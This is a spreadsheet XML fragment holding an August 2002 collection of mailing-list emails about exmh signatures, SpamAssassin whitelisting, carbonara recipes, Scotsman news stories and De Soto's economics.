    <t>--==_Exmh_267413022P Content-Type: text/plain; charset=us-ascii &gt; From:  Anders Eriksson  &gt; Date:  Thu, 22 Aug 2002 20:23:17 +0200 &gt; &gt;  &gt; Oooops! &gt;  &gt; Doesn't work at all. Got this on startup and on any attempt to change folde &gt; r (which fail) ~sigh~  I'd already found that and checked it in....apparently I did so after  you checked it out and before you sent this mail...I hoped I was fast enough  that you wouldn't see it. Try again! Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_267413022P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9ZUlVK9b4h5R0IUIRAr4LAJ9Mhzgw03dF2qiyqtMks72364uaqwCeJxp1 23jNAVlrHHIDRMvMPXnfzoE= =HErg -----END PGP SIGNATURE----- --==_Exmh_267413022P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 22 Aug 2002 15:25:24 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 15:25:24 -0400 (EDT)</t>
  </si>
  <si>
    <t>On Thu, 22 Aug 2002, Joseph S. Barrera III wrote:\n--]Why wait until you're dead? I'm sure there's enough carbon in\n--]the fat from your typical liposuction job to make a decent diamond.\n\nSo thats why I keep seeing DeBeers agents hovering around me.\n\n-tom(diamonds in the folds of my flesh)wsmf\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Paul Lussier &lt;pll@lanminds.com&gt;\nDate: Thu, 22 Aug 2002 15:13:10 -0400</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 15:13:10 -0400</t>
  </si>
  <si>
    <t>Paul Lussier &lt;pll@lanminds.com&gt;</t>
  </si>
  <si>
    <t>In a message dated: Thu, 22 Aug 2002 13:53:55 CDT\nUlises Ponce said:\n\n&gt;Thanks Paul,\n&gt;That is the way I am doing right now, but I would like to NOT use the mouse \n&gt;for such things. Any other clue?\n\nThe best I can think of is to figure out what the command being \nissued by exmh is that selects and inserts the sig and bind that to a \nkey sequence.  That shouldn't be *too* difficult, it's just a matter \nof figuring out the tcl (something my perl-based brain isn't excited \nabout :)\n-- \n\nSeeya,\nPaul\n--\n	It may look like I'm just sitting here doing nothing,\n   but I'm really actively waiting for all my problems to go away.\n\n	 If you're not having fun, you're not doing it right!\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Manoj Kasichainula &lt;manojk+fork@io.com&gt;\nDate: Thu, 22 Aug 2002 15:04:02 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 15:04:02 -0700</t>
  </si>
  <si>
    <t>Manoj Kasichainula &lt;manojk+fork@io.com&gt;</t>
  </si>
  <si>
    <t>On Thu, Aug 22, 2002 at 10:58:34PM +0200, Robert Harley wrote:\n&gt; An apparent quote from Dubya, from the Times (sent to me by my Dad):\n&gt; \n&gt; [URL]http://www.timesonline.co.uk[/URL],,1-43-351083,00.html\n\n[URL]http://www.snopes.com[/URL]\n\nClaim:   President George W. Bush proclaimed, "The problem with\nthe French is that they don't have a word for entrepreneur."\n\n\nOrigins:   Yet another French fried "George W. Bush is dumb"\nstory has been taken up by those who like their caricatures\ndrawn in stark, bold lines. According to scuttlebutt that\nemerged in the British press in July 2002, President Bush,\nBritain's Prime Minister Tony Blair, and France's President\nJacques Chirac were discussing economics and, in particular,\nthe decline of the French economy. "The problem with the\nFrench," Bush afterwards confided in Blair, "is that they don't\nhave a word for entrepreneur."\n\nThe source was Shirley Williams, also known as the Baroness\nWilliams of Crosby, who claimed "my good friend Tony Blair" had\nrecently regaled her with this anecdote in Brighton.\n\nLloyd Grove of The Washington Post was unable to reach Baroness\nWilliams to gain her confirmation of the tale, but he did\nreceive a call from Alastair Campbell, Blair's director of\ncommunications and strategy. "I can tell you that the prime\nminister never heard George Bush say that, and he certainly\nnever told Shirley Williams that President Bush did say it,"\nCampbell told The Post. "If she put this in a speech, it must\nhave been a joke."\n\nThis is far from the first time Bush has been made the butt of\na jibe meant to showcase what some perceive as his less than\nstellar intellectual abilities. Without straining our memories\ntoo hard, we can come up with three other instances we've\nchronicled on this site. In the summer of 2001, the joke of the\nmoment centered upon a supposed study that had resulted in the\nranking of Presidential IQs, with George W. Bush being pegged\nas the Chief Executive who scraped the bottom of the\nintelligence barrel. In December 2000 it was a fake Nostradamus\nquatrain which pontificated that the "village idiot" would win\nthe 2000 Presidential election. And in the spring of 2002, it\nwas the story of Bush's waving at Stevie Wonder that set folks\nto chortling up their sleeves.\n\nStories that illustrate this widely believed intellectual\nshortcoming will always waft after George W. Bush because they\nseemingly confirm what many already hold as true about this\npublic figure, that he's not the brightest fellow that's ever\nbeen. It is human nature to revel in yarns that the hearer at\nsome level agrees with, thus tales of this sort will always\nfall upon appreciative ears.\n\nBarbara "ears of corn" Mikkelson\n\nLast updated:   29 July 2002\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.timesonline.co.uk http://www.snopes.com http://xent.com</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Thu, 22 Aug 2002 15:01:33 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 15:01:33 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Meaningful sentences</t>
  </si>
  <si>
    <t>The Scotsman\n\n Thu 22 Aug 2002 \n\n Meaningful sentences \n \n Tracey Lawson \n \n \n If you ever wanted to look like "one of the most dangerous inmates in prison\n history", as one judge described Charles Bronson, nows your chance. Bronson -\n the serial hostage taker, not the movie star - has written a health and\n fitness guide in which he shares some of the secrets behind his legendary\n muscle power. \n \n Solitary Fitness - a title which bears testament to the fact that Bronson, 48,\n has spent 24 of his 28 prison years in solitary confinement - explains how he\n has turned himself into a lean, mean, fitness machine while living 23 hours a\n day in a space just 12 feet by eight feet, on a diet of scrubs grub and at\n virtually no cost. \n \n The book is aimed at those who want to get fabulously fit without spending a\n fortune on gym memberships, protein supplements or designer trainers, and\n starts with a fierce attack on some of the expensive myths churned out by the\n exercise industry. \n \n "I pick up a fitness mag, I start to laugh and I wipe my arse with it," is the\n opening paragraph penned by Bronson. "Its a joke and a big con and they call\n me a criminal!" You cant help feeling he has a point. \n \n This is not the first book that Bronson has written from behind bars, having\n already published Birdman Opens His Mind, which features drawings and poems\n created by Bronson while in prison. And he is not the first prisoner to\n discover creative expression while residing at Her Majestys pleasure. \n \n Jimmy Boyle, the Scots sculptor and novelist, discovered his artistic talents\n when he was sent to Barlinnie Prisons famous special unit, which aimed to\n help inmates put their violent pasts behind them by teaching them how to\n express their emotions artistically. Boyle was sentenced to life for the\n murder of "Babs" Rooney in 1967. Once released, he moved to Edinburgh where he\n has become a respected artist. His first novel, Hero of the Underworld, was\n published in 1999 and his autobiography, A Sense of Freedom, was made into an\n award-winning film. \n \n Hugh Collins was jailed for life in 1977 for the murder of William Mooney in\n Glasgow, and in his first year in Barlinnie prison stabbed three prison\n officers, earning him an extra seven-year sentence. But, after being\n transferred to the same unit that Boyle attended, he learned to sculpt and\n developed an interest in art. He later published Autobiography of a Murderer,\n a frank account of Glasgows criminal culture in the 1960s, which received\n critical praise. \n \n And Lord Archer doesnt seem to have had trouble continuing to write the books\n that have made him millions while in jail. He recently signed a three-book\n deal with Macmillan publishers worth a reported 10 million, and is no doubt\n scribbling away as we speak. \n \n So why is it that men like Collins, Bronson and Boyle, who can be so\n destructive towards society on the outside, can become so creative once stuck\n on the inside? Steve Richards, Bronsons publisher, has published many books\n about criminal figures and believes the roots of this phenomenon are both\n pragmatic and profound. \n \n He says: "Prison is sometimes the first time some criminals will ever have\n known a stable environment, and this can be the first time they have the\n chance to focus on their creative skills. \n \n "It may also be the first time that they have really had the chance of an\n education, if their early years have been hard. It could be the first time\n anyone has offered them the chance to explore their creative talents." \n \n However, Richards believes the reasons are also deeper than that. He says:\n "Once they are behind bars, the cold light of day hits them, and they examine\n the very essence of who they are. \n \n "They ask themselves, am I a man who wants to be remembered for violence? Or\n am I a man who can contribute to society, who can be remembered for something\n good?" \n \n Bronson - who was born Michael Gordon Peterson, but changed his name to that\n of the Hollywood star of the Death Wish films - has, so far, been remembered\n mainly for things bad. He was originally jailed for seven years for armed\n robbery in 1974, and has had a series of sentences added to his original term\n over the years as a result of attacking people in prison. In 2000 he was\n jailed for life after being convicted of holding a teacher hostage for nearly\n two days during a jail siege. \n \n Standing five feet ten and a half inches tall and weighing 210lbs, he is\n renowned for his strength. He has bent metal cell doors with his bare hands\n and does up to 3,000 - yes, 3,000 - press-ups a day. As he puts it: "I can hit\n a man 20 times in four seconds, I can push 132 press ups in 60 seconds." \n \n But judging by our current obsession with health and exercise, Solitary\n Fitness might be the book which will see Bronsons face sitting on every\n coffee table in the land. He might be the man to give us the dream body which\n so many so-called fitness gurus promise but fail to motivate us into. Because\n Bronson has learned to use words as powerfully as he can use his fists. \n \n "All this crap about high-protein drinks, pills, diets, its just a load of\n bollocks and a multi-million-pound racket," he writes, in what can only be\n described as a refreshingly honest style. "We can all be fat lazy bastards,\n its our choice, Im sick of hearing and reading about excuses, if you stuff\n your face with shit you become shit, thats logical to me." \n \n As motivational mantras go, that might be just the kick up the, er, backside\n we all needed. \n \n \n Solitary Fitness by Charles Bronson is published by Mirage Publishing and will\n be available in bookstores from October at 7.99\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Stewart Smith &lt;Stewart.Smith@ee.ed.ac.uk&gt;\nDate: Thu, 22 Aug 2002 15:01:20 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 15:01:20 +0100</t>
  </si>
  <si>
    <t>Re: [zzzzteana] Nothing like mama used to make</t>
  </si>
  <si>
    <t>Martin Adamson wrote: &gt;  &gt; Isn't it just basically a mixture of beaten egg and bacon (or pancetta,  &gt; really)? You mix in the raw egg to the cooked pasta and the heat of the pasta  &gt; cooks the egg. That's my understanding. &gt;  You're probably right, mine's just the same but with the cream added to the  eggs.  I guess I should try it without.  Actually looking on the internet for a  recipe I found this one from possibly one of the scariest people I've ever seen,  and he's a US Congressman: That's one of the worst non-smiles ever. Stew ps. Apologies if any of the list's Maine residents voted for this man, you won't  do it again once you've seen this pic. --  Stewart Smith Scottish Microelectronics Centre, University of Edinburgh. [URL]http://www.ee.ed.ac.uk[/URL] ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt; 4 DVDs Free +s&amp;p Join Now [URL]http://us.click.yahoo.com[/URL] ---------------------------------------------------------------------~-&gt; To unsubscribe from this group, send an email to: forteana-unsubscribe@egroups.com   Your use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Thu, 22 Aug 2002 14:55:23 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 14:55:23 -0700</t>
  </si>
  <si>
    <t>[Razor-users] honor is not in csl</t>
  </si>
  <si>
    <t>Folks, \n\nSome of you seem to have hardcoded honor as the default catalogue server.\nThere are three catalogue only servers running now, and honor is acting\nas a nomination only server. Tonight we will be completely turning off\ncatalogue support on honor, so if you are specifying honor with the -rs\noption, please take it out and let the agents discover a closeby\ncatalogue server.\n\ncheers,\nvipul.\n\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://vipul.net https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Thu, 22 Aug 2002 14:54:25 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 14:54:25 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Playboy wants to go out with a bang</t>
  </si>
  <si>
    <t>The Scotsman - 22 August 2002\n\n Playboy wants to go out with a bang \n \n \n AN AGEING Berlin playboy has come up with an unusual offer to lure women into\n his bed - by promising the last woman he sleeps with an inheritance of 250,000\n (160,000). \n \n Rolf Eden, 72, a Berlin disco owner famous for his countless sex partners,\n said he could imagine no better way to die than in the arms of an attractive\n young woman - preferably under 30. \n \n "I put it all in my last will and testament - the last woman who sleeps with\n me gets all the money," Mr Eden told Bild newspaper. \n \n "I want to pass away in the most beautiful moment of my life. First a lot of\n fun with a beautiful woman, then wild sex, a final orgasm - and it will all\n end with a heart attack and then Im gone." \n \n Mr Eden, who is selling his nightclub this year, said applications should be\n sent in quickly because of his age. "It could end very soon," he said.\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Thu, 22 Aug 2002 14:50:31 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 14:50:31 +0100</t>
  </si>
  <si>
    <t>&gt; I just had to jump in here as Carbonara is one of my favourites to make and \n&gt; ask \n&gt; what the hell are you supposed to use instead of cream? \n\nIsn't it just basically a mixture of beaten egg and bacon (or pancetta, \nreally)? You mix in the raw egg to the cooked pasta and the heat of the pasta \ncooks the egg. That's my understanding.\n\nMartin\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Paul Lussier &lt;pll@lanminds.com&gt;\nDate: Thu, 22 Aug 2002 14:43:03 -0400</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 14:43:03 -0400</t>
  </si>
  <si>
    <t>In a message dated: Thu, 22 Aug 2002 13:03:57 CDT\nUlises Ponce said:\n\n&gt;Thanks Tony, but I think doing it using component files will get a .signature \n&gt;by default, but I have many diferent signatures and I want to insert one of \n&gt;that signatures using a keyboard command. So for a message I will insert a \n&gt;signature, but for another message I will insert a different signature.\n&gt;\n&gt;Is it possible? I am using sedit for my messages.\n\nAhm, if you don't object to using a mouse for such things, exmh has \nthe ability to insert different sigs on demand.  Create a bunch of \ndifferent sig files, all beginning with .signature, and at start up, \nexmh will load them all.  In the Sedit window, you'll see a Sign...\nmenu item which will allow you to select between each of the listed \n.signature files for *that* e-mail.  You can actually use several if \nyou'd like (though I don't remember what Preferences... option allows \nfor this).\n\nHowever, the signature gets added on send, not inserted directly into \nthe existing Sedit window prior to composition.\n\nI currently have 6 different sig files I can choose between.\n\nAdditionally, if a .signature file has the execute bit turned on, \nexmh will attempt to execute the file and use the stdout of the \nscript as your signature.\n\nI hope this helps some.\n-- \n\nSeeya,\nPaul\n--\n	It may look like I'm just sitting here doing nothing,\n   but I'm really actively waiting for all my problems to go away.\n\n	 If you're not having fun, you're not doing it right!\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Stewart Smith &lt;Stewart.Smith@ee.ed.ac.uk&gt;\nDate: Thu, 22 Aug 2002 14:38:22 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 14:38:22 +0100</t>
  </si>
  <si>
    <t>&gt;  in adding cream to spaghetti carbonara, which has the same effect on pasta as\n&gt;  making a pizza a deep-pie; \n\nI just had to jump in here as Carbonara is one of my favourites to make and ask \nwhat the hell are you supposed to use instead of cream?  I've never seen a \nrecipe that hasn't used this.  Personally I use low fat creme fraiche because it \nworks quite nicely but the only time I've seen an supposedly authentic recipe \nfor carbonara  it was identical to mine (cream, eggs and lots of fresh parmesan) \nexcept for the creme fraiche.\n\nStew\n-- \nStewart Smith\nScottish Microelectronics Centre, University of Edinburgh.\n[URL]http://www.ee.ed.ac.uk[/URL]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: Ken Scott &lt;admin@shellworld.net&gt;\nFrom: Theo Van Dinter &lt;felicity@kluge.net&gt;\nDate: Thu, 22 Aug 2002 14:09:07 -0400</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 14:09:07 -0400</t>
  </si>
  <si>
    <t>Ken Scott &lt;admin@shellworld.net&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Some Stupid Questions</t>
  </si>
  <si>
    <t>--lteA1dqeVaWQ9QQl\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\nContent-Transfer-Encoding: quoted-printable\n\nOn Thu, Aug 22, 2002 at 01:01:44PM -0500, Ken Scott wrote:\n&gt; whitelist_from *@yahoogroups.com\n&gt;=20\n&gt; in his .spamassassin/user_prefs file, does that line not, in effect,\n&gt; tell the program to take no action at all against any mail coming in from\n&gt; yahoogroups.com, or is there still checking being done against it?  And if\n\nIt still gets checked, but a negative score is added in.  And it doesn't\nmean "coming in from" it means "From: address is @yahoogroups.com".\nThere's a Yahoo Groups compensation rule in 2.40 though. :)\n\n&gt; the latter, what does he need to place in user_prefs to cause such mail\n&gt; to be ignored?  I'm testing SA here with a few users who happen to be on\n\nignored completely?  you can't do that, put in a procmail rule.\n\n&gt; yahoogroups lists, before deploying it system-wide, and although the above\n&gt; line has been added to their user_prefs files, much of their list mail is\n&gt; still going to the spam folder due to all the usual things you would\n&gt; expect to trigger SA.\n\nYou'd want to either add your own compensation rule or up (negatively)\nthe whitelist score.\n\n--=20\nRandomly Generated Tagline:\nThere are perfectly good answers to those questions, but they'll have\n to wait for another night.\n=20\n 		-- Homer Simpson\n 		   Homers Barbershop Quartet\n\n--lteA1dqeVaWQ9QQl\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see [URL]http://www.gnupg.org[/URL]\n\niD8DBQE9ZSjDAuOQUeWAs2MRAk7zAKDCQJ8EQx5520TfLqgL+AogSqPOGwCg9fG4\nXMAdFMmo1slLu/d8Sqj44U0=\n=QHHd\n-----END PGP SIGNATURE-----\n\n--lteA1dqeVaWQ9QQl--\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exmh-users@spamassassin.taint.org\nFrom: Ulises Ponce &lt;ulises@mail.banirh.com&gt;\nDate: Thu, 22 Aug 2002 13:53:55 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 13:53:55 -0500</t>
  </si>
  <si>
    <t>Thanks Paul,\nThat is the way I am doing right now, but I would like to NOT use the mouse \nfor such things. Any other clue?\n\n-- \n\nSaludos,\nUlises\n\n Speaking words of wisdom ...\n\n\n&gt; In a message dated: Thu, 22 Aug 2002 13:03:57 CDT\n&gt; Ulises Ponce said:\n&gt; \n&gt; &gt;Thanks Tony, but I think doing it using component files will get a .signature \n&gt; &gt;by default, but I have many diferent signatures and I want to insert one of \n&gt; &gt;that signatures using a keyboard command. So for a message I will insert a \n&gt; &gt;signature, but for another message I will insert a different signature.\n&gt; &gt;\n&gt; &gt;Is it possible? I am using sedit for my messages.\n&gt; \n&gt; Ahm, if you don't object to using a mouse for such things, exmh has \n&gt; the ability to insert different sigs on demand.  Create a bunch of \n&gt; different sig files, all beginning with .signature, and at start up, \n&gt; exmh will load them all.  In the Sedit window, you'll see a Sign...\n&gt; menu item which will allow you to select between each of the listed \n&gt; .signature files for *that* e-mail.  You can actually use several if \n&gt; you'd like (though I don't remember what Preferences... option allows \n&gt; for this).\n&gt; \n&gt; However, the signature gets added on send, not inserted directly into \n&gt; the existing Sedit window prior to composition.\n&gt; \n&gt; I currently have 6 different sig files I can choose between.\n&gt; \n&gt; Additionally, if a .signature file has the execute bit turned on, \n&gt; exmh will attempt to execute the file and use the stdout of the \n&gt; script as your signature.\n&gt; \n&gt; I hope this helps some.\n&gt; -- \n&gt; \n&gt; Seeya,\n&gt; Paul\n&gt; --\n&gt; 	It may look like I'm just sitting here doing nothing,\n&gt;    but I'm really actively waiting for all my problems to go away.\n&gt; \n&gt; 	 If you're not having fun, you're not doing it right!\n&gt; \n&gt; \n&gt; \n&gt; \n&gt; _______________________________________________\n&gt; Exmh-users mailing list\n&gt; Exmh-users@redhat.com\n&gt; [URL]https://listman.redhat.com[/URL]\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Thu, 22 Aug 2002 13:52:38 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 13:52:38 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Moscow bomber</t>
  </si>
  <si>
    <t>Man Threatens Explosion In Moscow \n\nThursday August 22, 2002 1:40 PM\nMOSCOW (AP) - Security officers on Thursday seized an unidentified man who\nsaid he was armed with explosives and threatened to blow up his truck in\nfront of Russia's Federal Security Services headquarters in Moscow, NTV\ntelevision reported.\nThe officers seized an automatic rifle the man was carrying, then the man\ngot out of the truck and was taken into custody, NTV said. No other details\nwere immediately available.\nThe man had demanded talks with high government officials, the Interfax and\nITAR-Tass news agencies said. Ekho Moskvy radio reported that he wanted to\ntalk with Russian President Vladimir Putin.\nPolice and security forces rushed to the Security Service building, within\nblocks of the Kremlin, Red Square and the Bolshoi Ballet, and surrounded the\nman, who claimed to have one and a half tons of explosives, the news\nagencies said. Negotiations continued for about one and a half hours outside\nthe building, ITAR-Tass and Interfax reported, citing witnesses.\nThe man later drove away from the building, under police escort, and drove\nto a street near Moscow's Olympic Penta Hotel, where authorities held\nfurther negotiations with him, the Moscow police press service said. The\nmove appeared to be an attempt by security services to get him to a more\nsecure location. \n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Ulises Ponce &lt;ulises@mail.banirh.com&gt;\nDate: Thu, 22 Aug 2002 13:03:57 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 13:03:57 -0500</t>
  </si>
  <si>
    <t>Thanks Tony, but I think doing it using component files will get a .signature \nby default, but I have many diferent signatures and I want to insert one of \nthat signatures using a keyboard command. So for a message I will insert a \nsignature, but for another message I will insert a different signature.\n\nIs it possible? I am using sedit for my messages.\n\nThanks.\nUlises\n\n&gt; &gt; Hi!\n&gt; &gt; \n&gt; &gt; Is there a command to insert the signature using a combination of keys and not\n&gt; &gt; to have sent the mail to insert it then?\n&gt; \n&gt; I simply put it (them) into my (nmh) component files (components,\n&gt; replcomps, forwcomps and so on).  That way you get them when you are\n&gt; editing your message.  Also, by using comps files for specific\n&gt; folders you can alter your .sig per folder (and other tricks).  See\n&gt; the docs for (n)mh for all the details.\n&gt; \n&gt; There might (must?) also be a way to get sedit to do it, but I've\n&gt; been using gvim as my exmh message editor for a long time now.  I\n&gt; load it with a command that loads some email-specific settings, eg,\n&gt; to "syntax" colour-highlight the headers and quoted parts of an\n&gt; email)... it would be possible to map some (vim) keys that would add\n&gt; a sig (or even give a selection of sigs to choose from).\n&gt; \n&gt; And there are all sorts of ways to have randomly-chosen sigs...\n&gt; somewhere at rtfm.mit.edu... ok, here we go:\n&gt; rtfm.mit.edu/pub/usenet-by-group/news.answers/signature_finger_faq.\n&gt; (Warning... it's old, May 1995).\n&gt; \n&gt; &gt; Regards,\n&gt; &gt; Ulises\n&gt; \n&gt; Hope this helps.\n&gt; \n&gt; Cheers\n&gt; Tony\n&gt; \n&gt; \n&gt; \n&gt; _______________________________________________\n&gt; Exmh-users mailing list\n&gt; Exmh-users@redhat.com\n&gt; [URL]https://listman.redhat.com[/URL]\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Thu, 22 Aug 2002 13:02:45 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 13:02:45 -0700</t>
  </si>
  <si>
    <t>Property rights in the 3rd World (De Soto's Mystery of Capital)</t>
  </si>
  <si>
    <t>&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of\nDave\n&gt; Long\n&gt; Sent: Thursday, August 22, 2002 11:12 AM\n&gt; To: fork@spamassassin.taint.org\n&gt; Subject: RE: The Curse of India's Socialism\n&gt; \n&gt; \n&gt; \n&gt; When I'd read that "getting legal title\n&gt; can take 20 years", when I believe that\n&gt; 1 year ought to be more than sufficient,\n&gt; (and helped by the Cairo reference) I'd\n&gt; assumed that we were talking about the\n&gt; urban poor.\n&gt; \n&gt; If I see people living in mansions, or\n&gt; even in suburban subdivisions, I assume\n&gt; they didn't have too much trouble with\n&gt; their titles.\n\nPg 177:\nIn another country, a local newspaper, intrigued by our evidence of\nextralegal real estate holdings, checked to see if the head of state's\nofficial residence had a recorded title.  It did not.\n\nPg 92:\nThe value of land in the formal sector of Lima averages US$50 per square\nmeter, whereas in the area of Gamarra, where a great deal of Peru's\ninformal manufacturing sector resides, the value per square meter can go\nas high as US$3,000.\n\n==========\n\nI'd have made the same assumption you did.  De Soto says that isn't\ncorrect.  You can find mansions that don't have title.  A lot of them,\nin fact.  But they can't be used for collateral for a loan, or otherwise\nparticipate as 'capital' because of their extra-legal status.\n\n \n&gt; &gt; Mr. Long, I think you'd particularly enjoy the De Soto work.\n&gt; \n&gt; On the "to find" list.  Any chance of\n&gt; an explanation of that "Bell Jar" in\n&gt; the meantime?\n\nFrench historian Fernand Braudel (so Braudel's Bell Jar, not De Soto's)\n\n==&gt;\n\nThe key problem is to find out why that sector of society of the past,\nwhich I would not hesitate to call capitalist, should have lived as if\nin a bell jar, cut off from the rest; why was it not able to expand and\nconquer the whole of society? ... [Why was it that] a significant rate\nof capital formation was possible only in certain sectors and not in the\nwhole market economy of the time? ... It would perhaps be teasingly\nparadoxial to say that whatever was in short supply, money certainly was\nnot ... so this was an age where poor land was bought up and magnificent\ncountry residents built ... [How do we] resolve the contradiction ...\nbetween the depressed economic climate and the splendors of Florence\nunder Lorenzo the Magnificent?\n \n\n--------------\n\nDe Soto's theory is that the Bell Jar is formed when you segregate those\nwho have *practical* access to legal property rights and those who do\nnot.  The poor[1] have property -- lots and lots of property.  What they\ndon't have is access to the systems where we turn property into capital\nand allow it to start growing.  Their property can only be exchanged\nwith a small section of people who know them personally.\n\n[1] Actual poor people, not 'poor' Americans with a living standard that\nis the envy of most of the world.\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Craig R.Hughes" &lt;craig@deersoft.com&gt;,\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Thu, 22 Aug 2002 13:01:51 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 13:01:51 -0500</t>
  </si>
  <si>
    <t>"Craig R.Hughes" &lt;craig@deersoft.com&gt;,</t>
  </si>
  <si>
